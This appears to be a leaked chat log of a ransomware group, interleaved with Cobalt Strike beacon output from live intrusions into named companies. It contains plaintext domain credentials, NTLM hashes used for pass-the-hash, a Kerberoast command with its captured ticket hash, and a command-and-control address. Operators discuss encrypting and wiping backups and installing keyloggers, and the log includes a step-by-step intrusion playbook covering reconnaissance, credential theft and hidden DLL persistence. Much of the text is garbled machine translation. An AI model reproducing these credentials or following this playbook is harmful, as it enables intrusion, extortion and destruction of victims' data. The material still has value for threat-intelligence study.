    USHDC1-COPADS03.saig.frd.global [DS] Site: USHDC1
    USHDC1-COPADS02.saig.frd.global [DS] Site: USHDC1
    AUHDC2-COPADS02.saig.frd.global [DS] Site: AUHDC2
    AUHDC2-COPADS01.saig.frd.global [DS] Site: AUHDC2
    AUHDC1-COPADS03.saig.frd.global [DS] Site: AUHDC1
    AUSYD1-COPADS02.saig.frd.global [DS] Site: AUSYD1
    AUHDC1-COPADS02.saig.frd.global [DS] Site: AUHDC1
    AUHDC1-COPADS04.saig.frd.global [DS] Site: AUHDC1
    NLDEN1-COPADS01.saig.frd.global [DS] Site: NLDEN1
    AUHDC1-COPADS05.saig.frd.global [DS] Site: AUHDC1
    AUADE1-COPADS03.saig.frd.global [DS] Site: AUADE1
    KRSEO1-COPADS01.saig.frd.global [DS] Site: KRSEO1
     IDJAK-COPADS01.saig.frd.global [DS] Site: IDKBU1
    auspt1-copads02.saig.frd.global [DS] Site: AUSPT1
     EUCEN1COPADS01.saig.frd.global [DS] Site: EUCEN1
     EUCEN1COPADS02.saig.frd.global [DS] Site: EUCEN1
     EUCEN1COPADS03.saig.frd.global [DS] Site: EUCEN1
      usnachc-rbs01.saig.frd.global [RODC]
    ittur1-cop-rbs1.saig.frd.global [RODC]
    esmad1-cop-rbs1.saig.frd.global [RODC]
       aubne1-rbs01.saig.frd.global [RODC]
       auhdc2-rbs01.saig.frd.global [RODC]
       thpat1-rbs01.saig.frd.global [RODC]
       idjak1-rbs01.saig.frd.global [RODC]
       cnzhd1-rbs01.saig.frd.global [RODC]
       jptok1-rbs01.saig.frd.global [RODC]
       krseo1-rbs01.saig.frd.global [RODC]
       cnchd1-rbs01.saig.frd.global [RODC]
       auspt1-rbs01.saig.frd.global [RODC]
       aumel1-rbs01.saig.frd.global [RODC]
       ausyd1-rbs01.saig.frd.global [RODC]
       aucbr1-rbs01.saig.frd.global [RODC]
        auhob1-rbs1.saig.frd.global [RODC]
       auhob1-rbs01.saig.frd.global [RODC]
       auhdc1-rbs01.saig.frd.global [RODC]
       auper1-rbs01.saig.frd.global [RODC]
       auade1-rbs01.saig.frd.global [RODC]
       auwme1-rbs01.saig.frd.global [RODC]

================================================

adm.barsmr0 adm.bisfra0 adm.bremic0
adm.brodan0 adm.brodav1 adm.caupau0
adm.damben0 adm.davjon0 adm.evamar1
adm.fraste1 adm.hauant0 adm.kalnic0
adm.kemrob0 adm.kinzac0 adm.kinzac1
adm.lowrhy0 adm.macpet0 adm.matdmy0
adm.phykev0 adm.rutluq0 adm.soucam1
adm.staric0 adm.taydav1 adm.tedmar0
adm.turime0 adm.wu0dav0 adm.yorgar0
Admin.AVservers admin.DTservice admin.LMS
Admin.MOMaction admin.websense1 Admin.White
admnav0 Americadpm AUSYDHC-WINCL02$
backup-exec balpro0 cadmin0
dpservice eis_netapp EMEA.SCCM.Admin
EMEA.SCCM.Client fsae.service inssvc0
offser0 ops.ji0lei0 ops.kasbri0
ptbackup RBservice rdpservices
serqmi0 sqladmin svc.amwebsense
svc.cloudlink svc.dpmadmin svc.foldersync
svc.lansweeper svc.msmap svc.ncentral
svc.netrix svc.OMAdmin svc.sccmcliinst
svc.sharegate svc.sharegate2 svc.sharegate3
svc.sharegate4 svc.sharegate5 svc.sharepoint
svc.vcauth svc_actifio svc_scanner_chicago
SVC_Tenablescan svc_trendmicro svc-amer-ems-search
svc-apac-ems-search SVC-CloudEndure svc-emea-ems-search
SVC-Global-AD-LDAP SVC-Global-Azure-ADC svc-global-okta-ad
SVC-SCCMadmin sv-emea-adm-actifio tasks
tresvc0 ukmik-dbsa UKvc4admin
vcatladmin0 verisign verisignus
walbexec WebAppAdminProd
saig.frd.global\adm.fraste1 Access04
saig.frd.global\sqladmin u5t3r
saig.frd.global\Americadpm B0b@f3tt
saig.frd.global\CATOR-SQLSA T3rm1nal
saig.frd.global\tresvc0 3nterprisE
saig.frd.global\adm.kinzac0 dr3Amth3At3r

``saiglobal.com Just do not dump again have a good weekend thank you all caught up I have what is on Mon by 2 I need a session then and that's it1.done.rtpcompany.com> the wheel to spin a little
> I don't understand how you didn't understand that I need a session out of the water if I write you about it in that confu I never understood what session@user8 I never waited for a session from you
server:
US.ALLOYPOLYMERS.COM
hell: 47
alive: 10
closed 10

WINONA.RTPCO.LOCAL
by hell: 52
alive:45
closed 45

RTPCO.LOCAL
by hell: 106
alive: 90
closed:90


ARMS:
 
RTPCO.LOCAL
By hell: 1,076
Alive: 217
 
WINONA.RTPCO.LOCAL
By hell: 65
Alive: 12
 
US.ALLOYPOLYMERS.COM
By hell: 501
Alive: 24


domain vide unshared disks and killed important processes
ices have been wiped out
``Turn the wheel a little if yes, I'm waiting for the statistics and winding down the servers, the center and everything else?
[+] host called home, sent: 38 bytes
beacon> ls E:\Backups\Henderson
[*] Tasked beacon to list files in E:\Backups\Henderson
[+] host called home, sent: 38 bytes
[*] Listing: E:\Backups\Henderson\

 Size Type Last Modified Name
 ---- ---- ------------- ----
 780kb fil 01/15/2021 21:24:43 Henderson.vbm.RQGNN
 181gb fil 01/15/2021 23:05:27 HendersonD2020-12-11T220021_396F.vbk.RQGNN
 1gb fil 01/15/2021 22:15:23 HendersonD2020-12-12T220035_E54F.vib.RQGNN
 2gb fil 01/15/2021 22:16:32 HendersonD2020-12-13T220027_2042.vib.RQGNN
 2gb fil 01/15/2021 22:17:32 HendersonD2020-12-14T220020_913C.vib.RQGNN
 2gb fil 01/15/2021 22:18:43 HendersonD2020-12-15T220025_23D1.vib.RQGNN
 3gb fil 01/15/2021 22:20:21 HendersonD2020-12-16T220028_08E5.vib.RQGNN
 2gb fil 01/15/2021 22:21:38 HendersonD2020-12-17T220031_23A6.vib.RQGNN
 1gb fil 01/15/2021 22:22:36 HendersonD2020-12-18T220039_A0F6.vib.RQGNN
 1gb fil 01/15/2021 22:23:34 HendersonD2020-12-19T220022_EEF4.vib.RQGNN
 1gb fil 01/15/2021 22:24:32 HendersonD2020-12-20T220034_3366.vib.RQGNN
 1gb fil 01/15/2021 22:25:38 HendersonD2020-12-21T220024_E89B.vib.RQGNN
 1gb fil 01/15/2021 22:26:36 HendersonD2020-12-22T220028_76F2.vib.RQGNN
 3gb fil 01/15/2021 22:28:47 HendersonD2020-12-23T220039_6797.vib.RQGNN
 63gb fil 01/15/2021 23:01:49 HendersonD2020-12-24T220038_807A.vib.RQGNN
 64gb fil 01/15/2021 23:38:37 HendersonD2020-12-31T180035_06A1.vib.RQGNN
 1gb fil 01/15/2021 23:06:33 HendersonD2021-01-01T180033_058F.vib.RQGNN
 1gb fil 01/15/2021 23:07:40 HendersonD2021-01-02T180037_48E3.vib.RQGNN
 2gb fil 01/15/2021 23:09:01 HendersonD2021-01-03T180036_AB87.vib.RQGNN
 2gb fil 01/15/2021 23:10:27 HendersonD2021-01-04T180036_232E.vib.RQGNN
 2gb fil 01/15/2021 23:11:52 HendersonD2021-01-05T180029_410C.vib.RQGNN
 2gb fil 01/15/2021 23:13:07 HendersonD2021-01-06T180029_FE5D.vib.RQGNN
 3gb fil 01/15/2021 23:15:05 HendersonD2021-01-07T180031_D080.vib.RQGNN
 7gb fil 01/15/2021 23:19:29 HendersonD2021-01-08T180033_9BF8.vib.RQGNN
 2gb fil 01/15/2021 23:20:41 HendersonD2021-01-09T180036_A541.vib.RQGNN
 1gb fil 01/15/2021 23:21:48 HendersonD2021-01-10T180033_2241.vib.RQGNN
 1gb fil 01/15/2021 23:22:58 HendersonD2021-01-11T180034_3739.vib.RQGNN
 1gb fil 01/15/2021 23:24:16 HendersonD2021-01-12T180042_43E6.vib.RQGNN
 2gb fil 01/15/2021 23:26:05 HendersonD2021-01-13T180025_5427.vib.RQGNN
 2gb fil 01/15/2021 23:27:43 HendersonD2021-01-14T180029_951F.vib.RQGNN
 1gb fil 01/15/2021 23:28:53 HendersonD2021-01-15T180033_F651.vib.RQGNN
 930b fil 01/15/2021 22:14:24 readme.txt
``All the process1 file?
beacon> ls E:\Backups\Henderson
[*] Tasked beacon to list files in E:\Backups\Henderson
[+] host called home, sent: 38 bytes
[*] Listing: E:\Backups\Henderson\

 Size Type Last Modified Name
 ---- ---- ------------- ----
 780kb fil 01/15/2021 21:24:43 Henderson.vbm.RQGNN
 181gb fil 01/15/2021 23:05:27 HendersonD2020-12-11T220021_396F.vbk.RQGNN
 1gb fil 01/15/2021 22:15:23 HendersonD2020-12-12T220035_E54F.vib.RQGNN
 2gb fil 01/15/2021 22:16:32 HendersonD2020-12-13T220027_2042.vib.RQGNN
 2gb fil 01/15/2021 22:17:32 HendersonD2020-12-14T220020_913C.vib.RQGNN
 2gb fil 01/15/2021 22:18:43 HendersonD2020-12-15T220025_23D1.vib.RQGNN
 3gb fil 01/15/2021 22:20:21 HendersonD2020-12-16T220028_08E5.vib.RQGNN
 2gb fil 01/15/2021 22:21:38 HendersonD2020-12-17T220031_23A6.vib.RQGNN
 1gb fil 01/15/2021 22:22:36 HendersonD2020-12-18T220039_A0F6.vib.RQGNN
 1gb fil 01/15/2021 22:23:34 HendersonD2020-12-19T220022_EEF4.vib.RQGNN
 1gb fil 01/15/2021 22:24:32 HendersonD2020-12-20T220034_3366.vib.RQGNN
 1gb fil 01/15/2021 22:25:38 HendersonD2020-12-21T220024_E89B.vib.RQGNN
 1gb fil 01/15/2021 22:26:36 HendersonD2020-12-22T220028_76F2.vib.RQGNN
 3gb fil 01/15/2021 22:28:47 HendersonD2020-12-23T220039_6797.vib.RQGNN
 63gb fil 01/15/2021 23:01:49 HendersonD2020-12-24T220038_807A.vib.RQGNN
 64gb fil 01/15/2021 23:01:49 HendersonD2020-12-31T180035_06A1.vib
 1gb fil 01/15/2021 23:06:33 HendersonD2021-01-01T180033_058F.vib.RQGNN
 1gb fil 01/15/2021 23:07:40 HendersonD2021-01-02T180037_48E3.vib.RQGNN
 2gb fil 01/15/2021 23:09:01 HendersonD2021-01-03T180036_AB87.vib.RQGNN
 2gb fil 01/15/2021 23:10:27 HendersonD2021-01-04T180036_232E.vib.RQGNN
 2gb fil 01/15/2021 23:11:52 HendersonD2021-01-05T180029_410C.vib.RQGNN
 2gb fil 01/15/2021 23:13:07 HendersonD2021-01-06T180029_FE5D.vib.RQGNN
 3gb fil 01/15/2021 23:15:05 HendersonD2021-01-07T180031_D080.vib.RQGNN
 7gb fil 01/15/2021 23:19:29 HendersonD2021-01-08T180033_9BF8.vib.RQGNN
 2gb fil 01/15/2021 23:20:41 HendersonD2021-01-09T180036_A541.vib.RQGNN
 1gb fil 01/15/2021 23:21:48 HendersonD2021-01-10T180033_2241.vib.RQGNN
 1gb fil 01/15/2021 23:22:58 HendersonD2021-01-11T180034_3739.vib.RQGNN
 1gb fil 01/15/2021 23:24:16 HendersonD2021-01-12T180042_43E6.vib.RQGNN
 2gb fil 01/15/2021 23:26:05 HendersonD2021-01-13T180025_5427.vib.RQGNN
 2gb fil 01/15/2021 23:27:43 HendersonD2021-01-14T180029_951F.vib.RQGNN
 1gb fil 01/15/2021 23:28:53 HendersonD2021-01-15T180033_F651.vib.RQGNN
 930b fil 01/15/2021 22:14:24 readme.txt
``How much is ready?:meat_on_bone:well without the marble beef it's hard to wait chet (if you're going to order then orderwaitWe need to allocate budget for the second food order it's another hour and a half at least(wait for finals with backups even less than half is still alive:man_shrugging:prolly dead)skully and tdservers what cut off?session is alive backups are still encrypted (apparently takotrubili?
beacon> shell ping -n 1 10.89.11.40
[*] Tasked beacon to run: ping -n 1 10.89.11.40
[+] host called home, sent: 52 bytes
[+] received output:

Pinging 10.89.11.40 with 32 bytes of data:
Request timed out.

Ping statistics for 10.89.11.40:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
How's the progress on the backups? 20 more minutes, the guys said they ran through the servers - everything is OK, encrypted.)
```
E:Backups -size 15
There ``may be lags for the following reason - it's a virtualulka, it gets encrypted in several threads, and on the disk, where this virtualulka lies, the space freed from backups gets filled with crap at the same time. That's the disk io and does not take out. But it's not sure)) let me try again from the neighboring process with the flag? no, it's 181gb stalled... the rest are still intact... one that's less than a megabyte encrypted how many files? it will encrypt them until monday... let it encrypt them not.
 Directory of E:\

01/15/2021 09:24 PM <DIR> Backups
01/15/2021 09:24 PM <DIR> ProgramData
01/15/2021 09:24 PM 930 readme.txt
01/15/2021 09:24 PM <DIR> Test
               1 File(s) 930 bytes
               3 Dir(s) 1,824,136,421,376 bytes free

Last time, in the same domain, the backups were monitored for a few more days and there is a script that will quickly fill it all up. what is the disk size? delete and fill it up with crap. let's try to delete it, but it won't be faster. the process is running, but one file changed?where's the progress? would it be faster to delete them? what are we doing now? all the other backups in the ex are in progress? backups are in progress, another 10-15% have reformatted esx and snaps? backups are encrypted? domain vide unshared disks and killed important processes?
servers:

US.ALLOYPOLYMERS.COM
by hell: 47
alive: 10
closed 10

WINONA.RTPCO.LOCAL
by hell: 52
alive:45
closed 45

RTPCO.LOCAL
by hell: 106
alive: 90
shut down: 90
``````
ARMS:
 
RTPCO.LOCAL
By hell: 1,076
Alive: 217
 
WINONA.RTPCO.LOCAL
By hell: 65
Alive: 12
 
US.ALLOYPOLYMERS.COM
By hell: 501
Alive: 24

All disks were unshared everywhere, important processes were killed
``````
WINONA.RTPCO.LOCAL

On one server (WEB4) 16 IPs, 14 pulled in :D

by hell: 52
attracted: 45

with live ones, in the list of pinged they are 70, minus 15 ips that are held on 1 hostname = 55

WEB4.winona.rtpco.local [89.0.0.158] - pulled up on different IP
WEB4.winona.rtpco.local [89.0.0.152] - pulled up on another IP
ip-0-206.sprint-rev.hbci.com [65.162.42.206] - no 445
ip-0-252.sprint-rev.hbci.com [65.162.42.252] - no 445
ip-0-254.sprint-rev.hbci.com [65.162.42.254] - no 445
ip-0-197.sprint-rev.hbci.com [65.162.42.197] - no 445
ip-0-251.sprint-rev.hbci.com [65.162.42.251] - no 445
ip-0-242.sprint-rev.hbci.com [65.162.42.242] - no 445
ip-0-250.sprint-rev.hbci.com [65.162.42.250] - no 445
``rtpco.
90/90
4 zamapilnu get takmap? ni piepni psekni vmikne fly ``
US.ALLOYPOLYMERS.COM

by hell: 47
alive: 10
Attracted: 6
not attracted: 4, covered

AlloyAMMS.us.alloypolymers.com: 10.1.1.231
alloylicweb.us.alloypolymers.com: 10.1.1.238
alloyxenapp.us.alloypolymers.com: 10.1.1.237
alloyapp3.us.alloypolymers.com: 10.1.1.250
``They're at 445 check psek and other past?
```
10.89.11.120 -
10.56.0.30 -
10.89.11.26 -
10.56.0.31 -
in the list of servers such kutera at all I'm in the log of the pulled in ipi from other domains as resovlit? it's ping - and the issuance of that external-0-206.sprint-rev.hbci.com [65.162.42.206] - no 445
ip-0-252.sprint-rev.hbci.com [65.162.42.252] - no 445
ip-0-254.sprint-rev.hbci.com [65.162.42.254] - no 445
ip-0-197.sprint-rev.hbci.com [65.162.42.197] - no 445
ip-0-251.sprint-rev.hbci.com [65.162.42.251] - no 445
ip-0-242.sprint-rev.hbci.com [65.162.42.242] - no 445
ip-0-250.sprint-rev.hbci.com [65.162.42.250] - no 445 more than 100% as they say in the peoplevot because of this turns out in the list of servers are 52, and in the list of live - 70 ``.
WEB4.winona.rtpco.local: 89.0.0.66
WEB4.winona.rtpco.local: 89.0.0.160
WEB4.winona.rtpco.local: 89.0.0.159
WEB4.winona.rtpco.local: 89.0.0.158
WEB4.winona.rtpco.local: 89.0.0.157
WEB4.winona.rtpco.local: 89.0.0.156
WEB4.winona.rtpco.local: 89.0.0.155
WEB4.winona.rtpco.local: 89.0.0.154
WEB4.winona.rtpco.local: 89.0.0.153
WEB4.winona.rtpco.local: 89.0.0.152
WEB4.winona.rtpco.local: 65.162.42.250
WEB4.winona.rtpco.local: 65.162.42.242
WEB4.winona.rtpco.local: 65.162.42.197
WEB4.winona.rtpco.local: 65.162.42.254
WEB4.winona.rtpco.local: 65.162.42.252
WEB4.winona.rtpco.local: 65.162.42.251
``````
ip-0-206.sprint-rev.hbci.com [65.162.42.206] - no 445
ip-0-252.sprint-rev.hbci.com [65.162.42.252] - no 445
ip-0-254.sprint-rev.hbci.com [65.162.42.254] - no 445
ip-0-197.sprint-rev.hbci.com [65.162.42.197] - no 445
ip-0-251.sprint-rev.hbci.com [65.162.42.251] - no 445
ip-0-242.sprint-rev.hbci.com [65.162.42.242] - no 445
ip-0-250.sprint-rev.hbci.com [65.162.42.250] - no 445
````10.89.11.33
10.56.0.30
10.89.11.31
10.5.0.4
10.89.11.39
10.17.1.6
10.89.11.26
10.28.0.5
10.5.0.5
10.58.0.31
89.0.0.81
10.58.0.35
10.89.12.29
10.7.0.25
10.89.11.10
10.58.0.30
10.89.11.22
10.89.11.24
10.5.0.19
10.1.10.10
10.89.11.13
10.7.0.40
10.56.0.31
10.57.0.25
10.89.11.120
10.89.10.12 ``[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=kyyNPrj7yHJvyTG5K) ``
make_token ALLOY\Administrator j@mez9olk
```
```
pth WINONA\dch 876c802a60e4623dae480bf75d215bbc
```
```
pth RTPCO\Administrator 468b54c4c90c3f6e96486d9f0227540b
``````
185.150.189.165:21328
oRBZ6uRQQXg3EYp855awPPRBVQ8V7MooXcUR
``yeah. and also on top, if linux allowed you to zero kill?[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=khC6izSwxJ7zK2oCT) why, there will be nothing left?the bild throw activeladno on nixes then unpack the folder i hope that i already deleted everything from there i also deleted in mega there is a treshell) i did not delete that) fucklists and separate files that were taken out not pour in mega pure files from network deleted this archive in mega[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=fH2KsEoTv697XoKSy) listings, now i will add the listings? i do not have more there archive with backups of boring
luqdztoszgtqucubfv@upived.online
asdergIJW3RETmjite453
``Give access to the accounts from megitut data collected? Good night) good night tomorrow by 3session in slip files deleted ok for today everything.yesTomorrow work? check your ballymore fell off or not.  my offs worked for an hour)) #1-done-rtpcompany-com has a system so you can change the status of the result ok just access to rps apparently)and he is not LA and the first - current last time there was no funny thing, just ran SharpShares` ``
[+] received output:
Shares for 27L28:
	[--- Unreadable Shares ---]
		HP LaserJet Pro M404dn
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ print$

[+] received output:
Shares for HENDSTORAGE:
	[--- Unreadable Shares ---]
		Gina(HP Color LaserJet CP3525)
		Gina(HP LaserJet 400 M401dne)
		HP MFP477 QA Lab
		IPC$
		Matt(HP LaserJet 400 M401dne)
		Warehouse Office MFP(HP LaserJet 400 MFP M425dn)
		Warehouse Office(HP LaserJet 400 M401dne)
	[--- Listable Shares ---]
		ADMIN$ Apps C$ D$ Distro E$ GPO_Installs InstallApps ISOs Maint Office print$ Shared Users

``and select different groups do we have admin rights there?
```
\30L71.rtpco.local\ADMIN$ - Remote Admin
\30L71.rtpco.local\C$ - Default share
\30L71.rtpco.local\IPC$ - Remote IPC
I understand it correctly, do I have to check 415 machines by name in ad_compacts now? from different OU[ ](https://mediaeveryone.com/channel/general?msg=8gp4Z6s3knM7Z7iWp) didn't understand it and I asked for respawnsession failed at one moment I've played with both dir and lhome[ ](https://mediaeveryone.com/channel/general?msg=o6tMFScKZHG3cJJ6y) from different groups either it gives nothing or access is denied[ ](https://mediaeveryone.com/channel/general?msg=7nTdHajYQxDGJfPsA) 415there's jurl, username, password, click on the list, log in to the site, how do you get information from Lastpasa? how much access?? everywhereb access to the fs is denied and remot tula works, why is it vmic and even if even dir does not give vmic?dir[ ](https://mediaeveryone.com/channel/general?msg=DcCxwQPhssGgSCPLZ) only vmik checked?
what does it say?
Donald J. Trump (@realDonaldTrump) / Twitter - Mozilla Firefox
=======
[control][ctrl]
``He also tweets it#ballymoregroup-com Found a VPN, took off the browser. the passwords from the browser to the VPN didn't work. Installed keylogger and since now on the screen lockscreen - there is a chance to catch a password. while looking in the files on the disk. SearchOutlook.exe not looking for shit.[ ](https://mediaeveryone.com/channel/general?msg=oWPnwwNseAH2uEowX) golden ticket done, found alive yes, check admin's comps (fs, ff) in #1-done-rtpcompany-com spawnas not working under any creeds, under the current polzakami took the balls off
SharpShares: no listable shares besides print$
ShareFinder: where it says Remote Admin - it won't let me in
 
in #waterway-com check passwords lastpass/logmein, except mharper'a I do not see anyone yet, at the same time watching the keyloggerBut no change, started looking for mozilla on computers where admins are pledged and check the password file from the keyloggerwrite what you have on progress not in that window) again some matyladno now look yyudshp who knows it)))) where it saves the log? no configurations...exactly there, i did not notice it in the toolchain saw the keylogger? is there a third-party keylogger worthy of attention? if @user7 has something, let it go there, i think everything is already there this conf) `rawint.com ` no dotsink? well, work once it came to what edition of the software, i think only sofos and winndef ` `.
16464 972 LockApp.exe x64 1 BALLYMOREGROUP\rpearce
 3988 748 SavService.exe
 5184 748 SAVAdminService.exe
 5372 748 ALsvc.exe

``whenever there is a hardwindefc, see what else on ps see the red processes``.
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] savonaccess.sys Found
[+] 1 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[+] Sophos Found!

``I noticed that edr kvetch does not show all through edr + psst tell me what AV + because your coba was the cleanest show session put your shelkodblya, I had in the old one for some reason came ...-you do not fly? so not yet took silkodblya) and I do not fly by the classical 20 minutes put the scanners do not sleep as well by the way come silkodblya + - preferably clean all coba have?+ + there are not even files AD in the confab, apparently a serious AB at the entrance to the baly recommend access to the VPN #ballymoregroup-com and here +1 together with @user7 + here one man # 1-done-rtpcompany-comobe already had two nets to work I, by the way, also seem to have gone stale I do not have clean kobe?add me in #evo-com:man_raising_hand: i'm in place:space_invader:hiprivWhat's the Mon by what time? Yeah, everyone
yes, all:man_shrugging:a couple more restored to be sure in a long slip then lies:man_shrugging:then it should also reach the admin...the second as well knocks in the billd should reach if it goes first``
beacon> shell ping -n 1 asdasdasdsa.sadasdsadsa.kalarada.com
[*] Tasked beacon to run: ping -n 1 asdasdasdsa.sadasdsadsa.kalarada.com
[+] host called home, sent: 77 bytes
[+] received output:

Pinging asdasdasdsa.sadasdsadsa.kalarada.com [195.123.214.148] with 32 bytes of data:
Reply from 195.123.214.148: bytes=32 time=131ms TTL=49

Ping statistics for 195.123.214.148:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 131ms, Maximum = 131ms, Average = 131ms

`` hmm.
the domain works...this is how to ping asdasdasdsa.sadasdsa.domain.com -n 1 I don't mean just check otherwise) ``
beacon> shell ping -n 1 kalarada.com
[*] Tasked beacon to run: ping -n 1 kalarada.com
[+] host called home, sent: 53 bytes
[+] received output:

Pinging kalarada.com [195.123.214.148] with 32 bytes of data:
Reply from 195.123.214.148: bytes=32 time=131ms TTL=49

Ping statistics for 195.123.214.148:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 131ms, Maximum = 131ms, Average = 131ms

beacon> shell ping -n 1 www.kalarada.com
[*] Tasked beacon to run: ping -n 1 www.kalarada.com
[+] host called home, sent: 57 bytes
[+] received output:

Pinging www.kalarada.com [195.123.214.148] with 32 bytes of data:
Reply from 195.123.214.148: bytes=32 time=133ms TTL=49

Ping statistics for 195.123.214.148:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 133ms, Maximum = 133ms, Average = 133ms

I`m not sorry) test it) okay, do not touch the domains can not knock for other reasons if there are bots in the network on the backdoor admin - then the domains are alive directly from the car where you run) well, ping from where does not knock knew, but the fact that does not knock for 3 zakrepaty not know what?it means "it will" and if it gives out ipiniknado pinging level 3 domains it is very easy to check I only have 2) to check? or you do not have others? why? muncucfarfarisaa which ones are added?) I do not remember the other 2 domains have a mask
```
Adobe autoupdate#41162 1/22/2021 10:43:28 PM Running
``Let's change domains (there's no backups) there's one print server that's restored all the servers are important Why backups?
```
	main.crispregional.org 10.1.0.22 https SYSTEM * CRHSBACKUP
this is a new crispispisp version of the 10.1.1.22. if you want to copy and paste it into another crisp, it needs to be done before monday, i suggest we finish this today.
1. Gathering initial information about the domain and the environment
	- Full domain name
	- DCs list
	- LA\DA\EA
	- Password policy
	- PS
	- EDR
	- Systeminfo
On the basis of this information we see what kind of network we are looking at: a workgroup with VPN, a lab, a work network. If you can't make a conclusion from step 1, go to step 2.

2. Collecting BP information
	- ADFind
	- ADFind trust
If the total size of the files is more than 40mb, you need to put them into the archive. After analyzing the AD we make a conclusion about the network type. If it is a workgroup without a visible domain, we skip it and take the next network to work on. If a full-fledged network, move on

3. Gathering additional information about the domain and environment
	- Browser Dump
	- Seatbelt
	- kerberoast, asreproast
	- DuzzleUP
	- WinPEAS
	- Watson
	- GPP
	- ShareFinder
	- Check ZeroLogon
all files in the process and logs you put in a folder with the name of the external network domain, under the names corresponding to the utilities you run. You pass the brute-force hashes to team lead 2

4. Additional actions. During ShareFinder run, we run persist on the entry point (ONLY IF YOU SUGGESTED IT)
	- generate a NEW build for EVERY run
	- hide dll in user folders (preferably appdata and as far away as possible)
	- run it, check if the dll is not deleted + staska appeared, write to me: hostname, startup rights

all files are duplicated in the conf, as well as stored in a separate folder at your local location. Information about DC, LA, DA, EA, and all the passwords found in the process you put in a separate file creds.txt

5. If during or after the ShareFinder, as well as a quick brute-force hash, you get the opportunity to get out of the entry point, then by all means take advantage of it. Such a network gets priority and is not interrupted
``and check the login and passwords without a domain on itproping at least 1 successfulproping all pk from the group of the current user in the domain there is a user with the same name as this admin, but he is not active for a long time in this situation 2-2 is me who is so clever?
user 2-2 beacon> shell net user GPJHelp
[*] Tasked beacon to run: net user GPJHelp
[+] host called home, sent: 47 bytes
[+] received output:
User name GPJHelp
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set ?4/?18/?2018 9:47:12 AM
Password expires Never
Password changeable ??4/?18/?2018 9:47:12 AM
Password required No
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon ??4/?18/?2018 11:53:55 AM

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.

I don't think so, but his domain often drops out. Was there a VPN as well? Are there any requests going through?
```
shell ping 192.168.30.42
Pinging 192.168.30.42 with 32 bytes of data:
Ping statistics for 192.168.30.42:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
````execute-assembly Rubeus.exe kerberoast /format:hashcat /outfile:C:\ProgramData\hashes_rub_all.txt
$krb5tgs$23$*Pwwadfssvc$gpj.loc$host/STS.GPJ.COM*$19A27B2CD79CEB241CF9ED5E168FF22F$5195C6633D2F53FB0421BCBD97CD5AB57BE8EB06D2BE66C5C5CDB369384AD4BD72D772C383EACA9F2BEA60B444880A57502AC7D519722FC4620285DB747DF73CDB06267B397FED50A901F75CEBA2B59599CEF50A0354F6B5E2753C8AF61EC1BAEDB5F5562B90BDA373D9571308712FBC1F50FAB83F756809A48CFAB1FB91A3A839520AE873568071CE4109DDFDBC5C4188CB5420CF38AC2F8B7E4FB0CD0D65A1A46440492C9FD20B2AC6E0BB137CA82996CC1F634CFC84F2623EDA9EC03164BB7CA6DA697B548389CEF07C7E09E1C5B4E823BC03CF9217838B44AE76B7493B0F8A312C59F04AEF6868CB78F1A699946FAF69708DA43AE7C46502A77EF99D2506BCE37F0F553A703CB9E4E1D4115823C82DBC0722620EFF5D4B6F2F0B0BD68E05CE98F8B315C311EBE1CB3F2F4981F35B30E3EABA8F258DD4843FBFECD7BBE29478798B1E832002E33185D50796D0BD92404FCACA3CD50F14F86097997A82A42F237CA1649A58C6B2767DAD2E7CFFDB1698326C920D64F7592AD1D54B3C55AE0A8FE0F92D0DA652EC45118894A4672011B8B85306E80593374420F2E0CD15B336F9AF860529469F9584FA55ED68732DD644E12D39CB3DB3BCFADCD8E5801EA44033567263903069CDE4B93A061C088B661C81DF913575B9FC9B842F5BD74F07E51C8891C3583006523016F9E2B3

``Pass to brute-force write it down in the future and it was most likely disabled.
The request will be processed at a domain controller for domain gpj.loc.

User name GPJHelp
Full Name GPJHelp
Comment Helpdesk service account
User's comment
Country/region code 000 (System Default)
Account active No
Account expires Never

Password last set ?3/?29/?2011 9:04:23 AM
Password expires Never
Password changeable ??3/?29/?2011 9:04:23 AM
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships
Global Group memberships *Service Accounts *Domain Users
I wanted to check access, but you have to do it if it is not a domain and it's a local account.
user 2-3 beacon> shell dir \192.168.120.28\C$
[*] Tasked beacon to run: dir \192.168.120.28\C$
[+] host called home, sent: 54 bytes
[+] received output:
This user can't sign in because this account is currently disabled.

user 2-3 beacon> shell dir \10.200.100.42\C$
[*] Tasked beacon to run: dir \\10.200.100.42\C$
[+] host called home, sent: 53 bytes
[+] received output:
This user can't sign in because this account is currently disabled.

user 2-3 beacon> shell dir \\192.168.140.3\C$
[*] Tasked beacon to run: dir \\192.168.140.3\C$
[+] host called home, sent: 53 bytes
[+] received output:
This user can't sign in because this account is currently disabled.

user 2-3 beacon> shell dir \192.168.221.42\C$
[*] Tasked beacon to run: dir \192.168.221.42\C$
[+] host called home, sent: 54 bytes
[+] received output:
This user can't sign in because this account is currently disabled.

``````
beacon> shell dir \\192.168.120.28\C$
[*] Tasked beacon to run: dir \192.168.120.28\C$
[+] host called home, sent: 54 bytes
[+] received output:
This user can't sign in because this account is currently disabled.

``Check the validity of accesses on any host
dn:CN=GPJHelp,OU=Users,OU=Admins,DC=gpj,DC=loc
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: GPJHelp
>sn: Help
>description: Helpdesk service account
>givenName: GPJ
>distinguishedName: CN=GPJHelp,OU=Users,OU=Admins,DC=gpj,DC=loc
>instanceType: 4
>whenCreated: 20100203200249.0Z
>whenChanged: 20180413150136.0Z
>displayName: GPJHelp
